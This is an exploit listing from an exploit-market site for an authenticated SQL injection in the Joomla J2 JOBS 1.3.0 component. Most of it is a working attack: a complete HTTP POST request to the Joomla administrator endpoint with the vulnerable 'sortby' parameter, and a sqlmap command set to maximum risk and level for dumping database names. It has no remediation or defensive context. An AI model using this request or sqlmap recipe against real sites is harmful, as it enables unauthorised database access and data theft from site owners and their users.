[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla J2 JOBS 1.3.0 SQL Injection Vulnerability

Author
Mehmet Kelepçe
Risk
[
Security Risk High
]
0day-ID
0day-ID-34628
Category
web applications
Date add
01-07-2020
Platform
php
#Exploit Title: Joomla J2 JOBS - Authenticated SQL Injection
#Exploit Author: Mehmet Kelepçe / Gais Cyber Security
#Vendor Homepage: https://joomsky.com/
#Software Link: https://joomsky.com/products/js-jobs-pro.html
#Version: 1.3.0
#Tested on: Kali Linux - Apache2 

Vulnerable param: sortby
-------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1


-------------------------------------------------------------------------
sqlmap poc:

sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby

#  0day.today [2024-12-25]  #